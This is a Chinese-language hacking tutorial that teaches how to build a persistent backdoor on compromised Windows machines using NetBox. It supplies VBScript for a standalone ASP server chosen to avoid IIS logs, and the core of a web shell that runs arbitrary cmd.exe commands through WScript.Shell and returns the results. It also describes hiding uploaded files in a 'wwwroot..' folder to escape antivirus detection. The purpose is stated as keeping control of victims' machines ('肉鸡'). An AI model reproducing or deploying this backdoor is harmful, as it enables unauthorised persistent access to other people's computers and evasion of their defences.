一、前言

　　在当今微软当道的年代，找肉鸡已经不是什么难事，各种各样的傻瓜工具大大方便了菜鸟们的入侵，但是往往入侵成功了，怎么去做好后门，把肉鸡尽可能久的抓住往往困惑着像我一样的菜鸟们。用过无数网上经典的后门后，在丢失了许多辛辛苦苦弄到的肉鸡后，我下定决心要写自己的后门。于是有了下面的文章。

　　二、Netbox简介

　　一个偶然的机会，我认识了Netbox。Netbox是一个使用脚本语言进行应用软件开发与发布的开发环境和运行平台，使用 NetBox，可以完全使用脚本语言(比如 VBScript，Javascript) 创建出稳定高效的应用软件，并且可以平滑移植到从 Windows 98 到 Windows .NET Server 的全部操作系统上。

　　它可以方便的将asp应用编译成为独立运行的执行程序，完全摆脱iis的束缚(将iis卸载后程序运行仍然正常)，在几乎所有的Windows版本上面直接运行，完全不需要考虑平台兼容性和对asp运行环境的要求。同时NetBox还提供大量扩展部件，使得WEB应用更加方便。说了那么多，大家肯定很想见识见识这位帅哥吧，好。

　　三、一起动手

　　如果大家已经对脚本语言VBScript或者Javascript有一点了解，那就可以跟我动手了。我们的任务是在建立一个与iis完全无关的web服务器，它可以为我们提供FSO的支持，以方便上传文件。并支持脚本宿主WSH,这样我们就能执行命令了。在网站根目录里我们可以放上自己的asp木马或其它的木马后门并可以随时执行。

　　首先需要建立我们的web服务器，这个服务器和IIS没有任何关系，即使卸载了IIS它也可以运行。利用NetBox的HttpServer对象就能轻易的办到。

　　在记事本里写入如下几行代码：

Set httpd = CreateObject("NetBox.HttpServer") 　　*创建httpserver对象 　　If httpd.Create("", 8000) = 0 Then 　　*web服务端口设为8000，可以自己改，不要和其他端口冲突就行了。 　　Set host = httpd.AddHost("", "\wwwroot") 　　*设置web服务的根目录为文件夹"wwwroot"。 　　host.EnableScript = true 　　*使Web服务器能够理解服务器端脚本程序，既支持asp。 　　host.AddDefault "default.asp" 　　host.AddDefault "default.htm" 　　host.AddDefault "index.asp" 　　host.AddDefault "index.htm" 　　host.AddDefault "default.html" 　　host.AddDefault "index.html" 　　*设置缺省文件，相当与iis中的默认文档。 　　httpd.Start 　　*开始服务 　　else 　　httpd.Stop 　　Shell.Quit 0 　　End If 　　End Sub

　　将文件存为main.box。

　　这样一个支持asp的服务器源代码就写成功了，它可以让你的asp木马随心所欲的运行，而且不用担心会有日志记录，但是现在它还远不是一个后门，只是提供了与IIS相当的功能，为了防止后门被杀，我们不妨自己来写一个简单的CMD.ASP，当然不是那个所谓的最简短的asp后门了。我们要实现的功能是可以上传文件和执行命令。

　　这里只分析主要的代码，详细的代码附在了软件包里。

set pyeWSH=server.createobject("WSCRIPT.SHELL") 　　*建立shell(wshshell)对象pyeWSH 　　set pyeFSO=server.createobject("scripting.filesystemobject") 　　*建立文件系统对象pyeFSO用于文件方面的操作 　　szTempFile="C:\"& pyeFSO.GetTempName() 　　*GetTempName()是fso建立临时文件的一种方法 　　Call pyeWSH.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true) 　　*调用wshshell的run方法来执行命令，并把结果重定向到临时文件中 　　set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0) 　　*以读的方式打开临时文件

　　思路应该很清楚，我简单说说。建立shell对象是用于执行命令，建立文件系统对象是用于将命令执行的结果输入到一个临时文件中并将文件内容读出来。要看到命令执行的结果只要加上这样一句：

response.write server.HTMLEncode(oFile.ReadAll)

　　就能读出临时文件的内容并显示出来。实现上传文件功能的代码也很简单。

　　注意这里是将上传的文件保存到了肉鸡上的一个“wwwroot.”的文件夹下面，这个文件夹只能在CMD下面用mkdir wwwroot..\ 建立。放在这个文件夹里的文件在一般情况下是看不到的，所以可以在一定程度上躲过杀毒软件的查杀，不过执行的时候也要麻烦一点了，因为放在这里面的程序用shell对象的run方法运行不了的，因为根本找不到这个要执行的文件。但奇怪的是可以将里面的文件copy到别的地方，所以需要执行时就是先要将文件copy到其它目录下，当然啦这么简单的事我们的后门完全可以做到。Asp后门就这样做好了，很简单吧?而且功能也不差，如果你够懒的话，也可以直接用别人的Asp后门。